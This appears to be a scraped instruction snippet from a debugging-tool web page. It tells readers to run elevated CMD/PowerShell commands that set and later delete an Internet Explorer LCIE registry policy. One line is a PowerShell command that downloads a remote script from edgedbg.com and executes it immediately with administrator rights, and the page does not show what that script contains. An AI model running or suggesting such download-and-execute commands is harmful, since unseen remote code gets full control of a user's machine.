Open a CMD or PowerShell window as administrator and execute following command to disable Loosely Coupled IE (LCIE).
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Main" /v TabProcGrowth /t REG_DWORD /d 0 /f
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://edgedbg.com/files/iemap.ps1')"
CopiedCopy failed, please copy the command manuallyOpen a CMD or PowerShell window as administrator and execute following command to disable Loosely Coupled IE (LCIE).
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Main" /v TabProcGrowth /t REG_DWORD /d 0 /f
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Main" /v TabProcGrowth /f